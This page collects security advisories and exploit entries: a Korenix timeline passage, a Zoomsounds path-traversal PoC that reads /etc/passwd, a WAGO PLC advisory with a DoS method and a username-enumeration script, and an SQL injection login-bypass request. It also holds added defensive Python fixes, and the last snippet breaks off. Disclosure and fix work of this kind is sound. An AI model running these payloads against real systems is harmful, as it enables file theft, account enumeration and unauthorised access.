Agreed to release this<br /> advisory in Q4.<br />2021-06-01: Released related advisory SA-20210601-0.<br />2021-07-05: Follow-up meeting with vendor regarding next steps.<br />2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers<br /> from Korenix are still investigating the issues. JetWave 2311 went<br /> EoL, next status update in August. JetPort will be fixed in<br /> Q1 2022.<br />2021-09-15: Asked for status update.<br />2021-09-20: Korenix will provide a time schedule for the patches by end of next<br /> week.<br />2021-09-28: Meeting regarding the schedule. Fixes will be available by end of<br /> the year for the Korenix JetWave series.<br />2021-09-28: Update call with vendor; fixes will be available in November.<br />2021-11-18: Contact had difficulties getting a response from Korenix. JetWave<br /> 2212G 1.8.0 has been released, other fixes will be released in<br /> December.<br />2021-11-22: Vendor provides all other fixed versions, which have already been<br /> put online.<br />2021-12-17: Performed another advisory split.<br />2021-12-20: Update call with vendor. Identified another possibly affected<br /> device (JetWave 3420). 
Investigation will be started from Korenix<br /> as soon as possible.<br />2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware.<br />2022-01-17: Informed vendor about the advisory release within the next two<br /> weeks.<br />2022-01-19: Call with vendor; agreed that advisory can be published for<br /> JetWave series.<br />2022-01-24: Informed vendor about advisory release on 2022-01-31.<br />2022-01-31: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The following firmware updates are being provided by the vendor:<br /><br /> * Korenix JetWave 2212X / 1.9.1<br /> * Korenix JetWave 2212S / 1.9.1<br /> * Korenix JetWave 2212G / 1.8<br /> * Korenix JetWave 3220 V3 / 1.5.1<br /> * Korenix JetWave 3420 V3 / 1.5.1<br /> * Korenix JetWave 2311 / is EOL now<br /><br />The firmware can be downloaded from the vendor's support page:<br />https://www.korenix.com/en/support/index.aspx<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Thomas Weber / @2022<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)<br /># Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/<br /># Date: 2/12/2021<br /># Exploit Author: Uriel Yochpaz<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Software Link: <br /># Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45<br /># Tested on: Linux (DZS Zoomsounds version 5.82)<br /># CVE : CVE-2021-39316<br /><br />The vulnerability allows an unauthenticated remote attacker to perform directory traversal attacks.<br />It exists due to an input validation error when processing directory traversal sequences in the "link" parameter of the "dzsap_download" action. 
A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.<br /><br />Mitigation:<br />Install update from vendor's website.<br /><br />Vulnerable software versions ZoomSounds: <br />1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,<br />2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,<br />3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,<br />5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45<br /><br />PoC:<br />user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"<br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false<br />systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false<br 
/>systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false<br />systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false<br />syslog:x:104:108::/home/syslog:/bin/false<br />_apt:x:105:65534::/nonexistent:/bin/false<br />messagebus:x:106:110::/var/run/dbus:/bin/false<br />uuidd:x:107:111::/run/uuidd:/bin/false<br />lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false<br />whoopsie:x:109:117::/nonexistent:/bin/false<br />avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false<br />avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false<br />dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false<br />colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false<br />speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false<br />hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false<br />kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false<br />pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false<br />rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false<br />saned:x:119:127::/var/lib/saned:/bin/false<br />usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false<br />user:x:1000:1000:user,,,:/home/user:/bin/bash<br />mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false<br /></code></pre>
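The PoC above walks out of the plugin's download directory with "../" sequences in the link parameter. The added example below is not plugin code (the plugin is PHP; Python is used here so the check can be run as is), and the download root and the sample link values are assumptions. It places the naive path construction that makes the traversal possible next to a containment check that rejects it, including the URL-encoded and absolute-path variants a tester would try next.

```python
"""Download-path handling: naive (traversable) vs. contained (added example)."""
import posixpath
from urllib.parse import unquote

# Assumed download root; the plugin's real directory is not given on the page.
DOWNLOAD_ROOT = "/var/www/html/wp-content/uploads"


def resolve_unsafe(root: str, link: str) -> str:
    """What a naive handler does: glue the user-controlled link onto the root.
    '..' segments walk out of the root and normpath happily yields /etc/passwd."""
    return posixpath.normpath(posixpath.join(root, unquote(link)))


def resolve_safe(root: str, link: str) -> str:
    """Decode once, reject NUL bytes and absolute paths, normalise, then require
    that the result is a proper descendant of the root. Raises ValueError otherwise."""
    decoded = unquote(link)
    if "\0" in decoded:
        raise ValueError("NUL byte in link")
    if decoded.startswith("/"):
        raise ValueError("absolute path in link")
    root_n = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_n, decoded))
    # commonpath is the containment test; a plain startswith(root) would also
    # accept a sibling directory such as .../uploads_old
    if candidate == root_n or posixpath.commonpath([root_n, candidate]) != root_n:
        raise ValueError(f"link escapes download root: {link!r}")
    # On a live server, additionally resolve symlinks (os.path.realpath) and
    # re-run the same containment check before opening the file.
    return candidate


def is_allowed(root: str, link: str) -> bool:
    """Boolean wrapper around resolve_safe() for request handlers and tests."""
    try:
        resolve_safe(root, link)
        return True
    except ValueError:
        return False
```

The stronger fix for a download action is to stop accepting paths at all and look the attachment up by its database ID, serving the stored path from the server side; the containment check above is the minimum for any endpoint that must keep taking a path-like parameter.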
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220126-0 ><br />=======================================================================<br /> title: Denial of service & User Enumeration<br /> product: WAGO 750-8xxx PLC<br /> vulnerable version: < Firmware 20 Patch 1 (v03.08.08)<br /> fixed version: Firmware 20 Patch 1 (v03.08.08)<br /> CVE number: CVE-2021-34593<br /> impact: Medium<br /> homepage: https://www.wago.com/<br /> found: 2021-05-05<br /> by: SEC Consult Vulnerability Lab<br /> These vulnerabilities were discovered during the research<br /> cooperation initiative "OT Cyber Security Lab" between<br /> Verbund AG and SEC Consult Group.<br /> Gerhard Hechenberger (Office Vienna)<br /> Steffen Robertz (Office Vienna)<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Optimum performance and availability: Thanks to their ultra-high performance,<br />low power consumption, numerous interfaces, space-saving design and high<br />reliability, WAGO’s user-friendly controllers (PLCs) are cost-effective<br />automation solutions. 
For optimal automation both inside and outside the<br />control cabinet: the flexible IP20 remote I/O systems for all applications<br />and environments."<br /><br />Source: https://www.wago.com/us/c/controllers-bus-couplers-i-o<br /><br /><br />Business recommendation:<br />------------------------<br />WAGO's customers should upgrade the firmware to the latest version available.<br /><br />A thorough security review should be performed by security professionals to<br />identify further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Denial of Service (Codesys) (CVE-2021-34593)<br />The "plclinux_rt" binary is listening on port 2455. It handles communication with<br />the CODESYS suite. By sending requests that define an invalid packet size, a<br />malloc error can be triggered. This leads to a denial of service of the remote<br />connectivity of the codesys service.<br /><br />This was also reported to and released together with CODESYS, find the<br />corresponding advisories here:<br />https://sec-consult.com/vulnerability-lab/advisory/codesys-v2-denial-of-service/<br />https://customers.codesys.com/index.php?eID=dumpFile&t=f&f=16877&token=8faab0fc1e069f4edfca5d5aba8146139f67a175<br /><br /><br />2) Enumeration of Users<br />Due to a time-based side channel vulnerability, it can be derived which<br />usernames are valid. This eases the process of brute-forcing valid credentials.<br /><br /><br />3) Outdated Software with Known Vulnerabilities<br />The PLC is using multiple outdated software components with known exploits.<br /><br /><br />4) Insufficient Hardening of Binaries<br />Multiple binaries are not compiled with available security features. 
This will<br />ease further attacks once a memory corruption vulnerability has been spotted.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Denial of Service (Codesys) (CVE-2021-34593)<br />Codesys packet headers are structured like below (pseudo code):<br /><br />struct codesys_header {<br />    uint16_t magic;<br />    int32_t packet_size;<br />};<br /><br />The magic bytes will be 0xbbbb. By defining a packet size of 0xffffffff, a size<br />of 4 GB is defined. The following pseudo code will be used to handle the<br />request:<br /><br />allocated_mem = (byte*)SysAllocDataMemory(codesys_header.packet_size);<br />buffer_info->recv_buf_wout_header = allocated_mem;<br />if (allocated_mem == (byte *)0x0) {<br />    return;<br />}<br /><br />As 4 GB of memory are not available, malloc will return a NULL pointer, which is<br />passed back through the SysAllocDataMemory() function and the return statement<br />in the pseudo code will be hit. Thus, the TCPServerTask() function will return.<br />The file descriptor for the client is not cleared in advance. Therefore, the<br />socket stays open indefinitely. A new client will open the next file<br />descriptor. As only 19 clients are allowed to be connected simultaneously, it<br />is sufficient to send 19 requests with a wrong packet length to force the PLC<br />into a state where it will refuse further connections to the Codesys service.<br /><br />The current implementation is missing the call to SysSockClose() once a buffer<br />allocation fails.<br /><br /><br />2) Enumeration of Users<br />A time-based side channel vulnerability in the webserver's authentication<br />method is leaking information about valid usernames. 
The following code snippet is<br />used in the login method:<br /><br />// get password file and iterate over every line<br />$pwFileArray = file($passwordFilename);<br />foreach($pwFileArray as $lineNo => $pwFileLine)<br />{<br />    // extract username and user password<br />    $passwordFileData = explode(':', trim($pwFileLine));<br />    // if username was found in line, verify given password with user password<br />    if(isset($passwordFileData[0]) && ($passwordFileData[0] === $username))<br />    {<br />        $pwCorrect = password_verify($password, $passwordFileData[1]);<br />        break;<br />    }<br />}<br /><br />The password hash is only calculated if the username is found to be valid. As<br />the PLC has limited computational power, this results in different timings for<br />the response depending on the validity of the username. The following script<br />can be used to find valid users. The parameter 'delay_valid' might need to be<br />adjusted to the network speed:<br /><br />----------------------------<br />#!/usr/bin/env python3<br />import requests<br />import sys<br />import urllib3<br /><br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /># request timeout in seconds: a valid username makes the PLC compute the<br /># password hash, so its answer arrives later than for an unknown username<br />delay_valid = 0.2<br /><br /># one candidate username per line in the file given as first argument<br />with open(sys.argv[1], "r") as f:<br />    users = [line.strip() for line in f if line.strip()]<br /><br />for user in users:<br />    payload = {"username": user, "password": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}<br />    cnt = 0<br />    for i in range(5):<br />        try:<br />            requests.post("https://<your_PLC_IP>/wbm/php/authentication/login.php", json=payload, timeout=delay_valid, verify=False)<br />        except requests.exceptions.Timeout:<br />            # no answer within delay_valid: count it as a slow, hash-computing response<br />            cnt = cnt + 1<br />    if cnt >= 3:<br />        print("[*]Valid User: {}".format(user))<br />-----------------------------<br /><br /><br />3) Outdated Software with Known Vulnerabilities<br />The following outdated and vulnerable components were identified using the IoT Inspector<br />firmware analysis tool:<br /><br />- Dnsmasq 2.80: 9 CVEs<br />- Bash 4.4.23: 1 CVE<br />- GNU glibc 2.30: 12 
CVEs<br />- Linux Kernel 4.9.146: 663 CVEs<br />- OpenSSL 1.0.1: 103 CVEs<br />- BusyBox 1.30.1: 2 CVEs<br />- Curl 7.72.0: 1 CVE<br />- OpenSSH 7.9p1: 4 CVEs<br />- PHP 7.3.15: 11 CVEs<br />- Wpa_supplicant 2.6: 20 CVEs<br />- NET-SNMP 5.8: 1 CVE<br />- Libpcap 1.8.1: 5 CVEs<br />- Info-ZIP 3.0: 13 CVEs<br /><br /><br />4) Insufficient Hardening of Binaries<br />The following features were extracted with the IoT Inspector:<br />- 1.9% of all executables support full RELRO<br />- 84.6% support partial RELRO<br />- Only 3.6% of all executables make use of stack canaries<br />- 58.9% are using ASLR/PIE<br /><br />The plclinux_rt binary is an example of a particularly vulnerable binary. It<br />accepts user input on port 2455 and is missing all compile-time security<br />features. Thus, it's a perfect candidate to successfully exploit any identified<br />buffer overflow.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested and found to be vulnerable:<br />* WAGO 750-8xxx Firmware 18 (v03.06.11)<br />* WAGO 750-8xxx Firmware 15 (v03.03.10)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-05-25: Contacting vendor through support.at@wago.com, asking for<br /> security contact information. Support informed about their<br /> PSIRT team. Set preliminary release date to 2021-07-14.<br />2021-05-26: Contacting PSIRT through psirt@wago.com for encryption options.<br />2021-05-27: Received PGP key from PSIRT, transmitted encrypted advisory<br /> to psirt@wago.com.<br />2021-05-31: Wago PSIRT notifies about decryption problems.<br />2021-06-02: Wago PSIRT redirects to VDE CERT for encrypted transmission.<br /> Transmitted encrypted advisory to info@cert.vde.com. Set release<br /> date to 2021-07-22. 
Wago PSIRT resolves decryption problems.<br />2021-06-07: Received confirmation from VDE CERT.<br />2021-08-11: On request, Wago PSIRT informs about the investigation results<br /> and mentions that the DoS was already reported and is fixed with<br /> firmware 18 patch 3.<br />2021-08-18: A check on the most recent public firmware release<br /> v18 (v03.06.19) shows that the vulnerability still exists. Wago<br /> PSIRT is notified.<br />2021-09-01: Wago PSIRT confirms and ensures the issue is investigated.<br />2021-09-29: Request status from Wago PSIRT. Set new release date to 2021-11-16.<br />2021-09-30: Wago PSIRT states that CODESYS provided a fix which is currently<br /> tested and to wait for a coordinated release with CODESYS.<br />2021-10-15: CODESYS informs about the assigned CVE-2021-34593 and the planned<br /> publishing date.<br />2021-10-18: Requesting information from Wago on an updated firmware version.<br />2021-10-19: Wago PSIRT states that they just received the new CODESYS sources<br /> and it will take some more weeks to create a new firmware release.<br />2021-10-28: CODESYS vulnerability CVE-2021-34593 is released in a coordinated<br /> manner together with CODESYS group without exploit details.<br />2021-11-30: Request status from Wago PSIRT on new firmware release.<br />2022-01-17: Request status from Wago PSIRT on new firmware release again.<br />2022-01-18: Wago PSIRT informs that firmware 20 Patch 1 released on January 10,<br /> 2022 fixes the remaining issue. The firmware was not yet published<br /> on their website.<br />2022-01-26: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />Immediately update the PLCs to the fixed firmware version provided by the<br />vendor to mitigate CVE-2021-34593.<br /><br />The fixed firmware release 20 patch 1 can be obtained from<br />https://www.wago.com/de/d/6599873<br /><br />Regarding vulnerability 2)<br />As stated by Wago, there are only two possible default usernames. 
Therefore,<br />the username enumeration may not gain additional information and this will<br />not be changed.<br /><br />Additionally, due to varying release cycles, there is a delay<br />in updating components (affecting the other identified vulnerabilities). It is<br />planned to change to a new distribution release with firmware 20.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Gerhard Hechenberger, Steffen Robertz / @2022<br /><br /><br 
/></code></pre>
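The descriptor leak behind vulnerability 1) is easiest to see in a small model. The following Python is an added example, not code from plclinux_rt or from SEC Consult: it parses the header layout the advisory gives (uint16_t magic, int32_t packet_size), models SysAllocDataMemory() failing on an unreasonable size, and compares the advisory's control flow (return without SysSockClose()) with a handler that releases the descriptor before returning. The little-endian byte order, the 1 MiB body limit and the FakeSocket class are assumptions made for the example; the 19-slot client table is the figure stated in the advisory.

```python
import struct

CODESYS_MAGIC = 0xBBBB
HEADER = struct.Struct("<Hi")     # uint16_t magic, int32_t packet_size (little-endian assumed)
MAX_CLIENTS = 19                   # simultaneous connections the advisory reports
MAX_PACKET_SIZE = 1 << 20          # assumed sane upper bound for a request body


class FakeSocket:
    """Stand-in for a client descriptor so the example runs without a network."""

    def __init__(self, payload: bytes):
        self.payload = payload
        self.closed = False

    def recv(self, n: int) -> bytes:
        data, self.payload = self.payload[:n], self.payload[n:]
        return data

    def close(self) -> None:       # plays the role of SysSockClose()
        self.closed = True


def alloc_data_memory(size: int):
    """Models SysAllocDataMemory(): None when the request cannot be satisfied."""
    if size < 0 or size > MAX_PACKET_SIZE:
        return None
    return bytearray(size)


class CodesysServer:
    def __init__(self, close_on_alloc_failure: bool):
        self.close_on_alloc_failure = close_on_alloc_failure
        self.clients = []          # descriptors still open; new clients are refused when full

    def accept(self, sock: FakeSocket) -> bool:
        """Return False when the connection is refused because the table is full."""
        self.clients = [c for c in self.clients if not c.closed]
        if len(self.clients) >= MAX_CLIENTS:
            return False
        self.clients.append(sock)
        self.handle(sock)
        return True

    def handle(self, sock: FakeSocket) -> None:
        hdr = sock.recv(HEADER.size)
        if len(hdr) < HEADER.size:
            sock.close()
            return
        magic, size = HEADER.unpack(hdr)
        if magic != CODESYS_MAGIC:
            sock.close()
            return
        buf = alloc_data_memory(size)
        if buf is None:
            # The advisory's bug: returning here without closing leaks the
            # descriptor. The corrected handler releases it before returning.
            if self.close_on_alloc_failure:
                sock.close()
            return
        body = sock.recv(size)
        buf[:len(body)] = body
        sock.close()               # normal completion releases the slot


def oversized_request() -> bytes:
    """packet_size 0xffffffff: -1 as int32_t, about 4 GB once treated as unsigned."""
    return HEADER.pack(CODESYS_MAGIC, -1)


def valid_request(body: bytes = b"\x01") -> bytes:
    return HEADER.pack(CODESYS_MAGIC, len(body)) + body


def still_accepts_after_exhaustion(close_on_alloc_failure: bool) -> bool:
    """Feed MAX_CLIENTS oversized requests, then check whether a valid client still gets in."""
    server = CodesysServer(close_on_alloc_failure)
    for _ in range(MAX_CLIENTS):
        server.accept(FakeSocket(oversized_request()))
    return server.accept(FakeSocket(valid_request()))


if __name__ == "__main__":
    print("leaking handler accepts after exhaustion:", still_accepts_after_exhaustion(False))
    print("closing handler accepts after exhaustion:", still_accepts_after_exhaustion(True))
```

The two things the corrected handler does are the ones a reviewer would look for in any length-prefixed protocol parser: bound the declared size before allocating, and make every early return pass through the same cleanup so a rejected request cannot pin a descriptor.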
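Vulnerability 2) comes from the PHP loop above only calling password_verify() when the username matches a line of the password file, so an unknown username is answered without doing the expensive hash. The usual fix is to perform exactly one hash computation per attempt, against a real hash of a throwaway password when the user does not exist. The following Python is an added example, not the WAGO web server's code: it rebuilds both control flows, with PBKDF2-HMAC-SHA256 standing in for PHP's password_verify(), and instruments the hash step so the difference can be checked by counting rather than by timing. The password file lines, usernames and passwords are constructed for the example.

```python
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 100_000          # enough work to make the timing gap visible


def make_hash(password: str) -> str:
    """Return 'salthex$hashhex', the stored form used in this example."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + dk.hex()


VERIFY_CALLS = 0


def verify(password: str, stored: str) -> bool:
    """The expensive step, instrumented so callers can count how often it runs."""
    global VERIFY_CALLS
    VERIFY_CALLS += 1
    salt_hex, hash_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk, bytes.fromhex(hash_hex))


# constructed password file, same "username:hash" layout the PLC's snippet splits on ':'
PW_FILE_LINES = [
    "admin:" + make_hash("correct horse"),
    "user:" + make_hash("battery staple"),
]
# a genuine hash of a random throwaway password, verified whenever the username is unknown
DUMMY_HASH = make_hash(os.urandom(16).hex())


def login_vulnerable(username: str, password: str, lines=PW_FILE_LINES) -> bool:
    """Same control flow as the PHP: the hash only runs when the username matches."""
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) == 2 and fields[0] == username:
            return verify(password, fields[1])
    return False


def login_fixed(username: str, password: str, lines=PW_FILE_LINES) -> bool:
    """Exactly one verification per attempt, against DUMMY_HASH when the user is unknown."""
    stored, found = DUMMY_HASH, False
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) == 2 and fields[0] == username:
            stored, found = fields[1], True    # no break: the whole file is scanned every time
    ok = verify(password, stored)
    return ok and found


def verifications(login_fn, username: str, password: str) -> int:
    """How many hash computations one login attempt triggers."""
    global VERIFY_CALLS
    VERIFY_CALLS = 0
    login_fn(username, password)
    return VERIFY_CALLS


def response_time(login_fn, username: str, password: str = "x", samples: int = 5) -> float:
    """Median wall-clock time of an attempt, the quantity the advisory's script measures."""
    times = []
    for _ in range(samples):
        t0 = time.perf_counter()
        login_fn(username, password)
        times.append(time.perf_counter() - t0)
    return sorted(times)[samples // 2]


if __name__ == "__main__":
    for fn in (login_vulnerable, login_fixed):
        print("%-16s known user %.3fs   unknown user %.3fs"
              % (fn.__name__, response_time(fn, "admin"), response_time(fn, "nobody")))
```

Run stand-alone, the script prints a visible gap between known and unknown usernames for login_vulnerable and none for login_fixed. The remaining differences in login_fixed (a string comparison per line) are orders of magnitude below the hash cost, which is why the dummy verification is the accepted mitigation rather than a full constant-time lookup.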
<pre><code># Exploit Title: Online Magazine Management System 1.0 - SQLi Authentication Bypass<br /># Date: 01-12-2021<br /># Exploit Author: Mohamed habib Smidi (Craniums)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip<br /># Version: 1.0<br /># Tested on: Ubuntu<br /><br /><br /># Description :<br /><br />Admin panel authentication can be bypassed due to a SQL injection vulnerability in the login form.<br /><br /># Request :<br /><br />POST /magazines/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)<br />Gecko/20100101 Firefox/93.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/magazines/admin/login.php<br />Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br /><br />username='+or+1%3D1+limit+1+--+-%2B&password=aaaa<br /><br /></code></pre>
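The request above works because the login form's username value is spliced into the SQL text, so the quote in it ends the string literal and the rest becomes part of the WHERE clause. The following Python is an added example, not the Online Magazine Management System's code: it runs the URL-decoded username from the request against a query built by string formatting and against the same query with bound parameters, on an in-memory SQLite table constructed for the example. The table layout, the SHA-256 password field and the account are assumptions made to keep the example self-contained.

```python
import hashlib
import sqlite3

# the username field of the request above, URL-decoded
INJECTED_USERNAME = "' or 1=1 limit 1 -- -+"


def pw_hash(password: str) -> str:
    # SHA-256 keeps the example short; real code uses a slow password hash such as bcrypt
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    """Constructed users table with a single admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", pw_hash("s3cret")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the WHERE clause by string formatting, so quotes in the input become SQL.

    With INJECTED_USERNAME the statement becomes
        ... WHERE username = '' or 1=1 limit 1 -- -+' AND password = '...'
    and everything after '--' is a comment, so the password check disappears.
    """
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, pw_hash(password)))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, username: str, password: str):
    """Bound parameters: the values travel separately from the statement text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, pw_hash(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable query, injected username:", login_vulnerable(db, INJECTED_USERNAME, "aaaa"))
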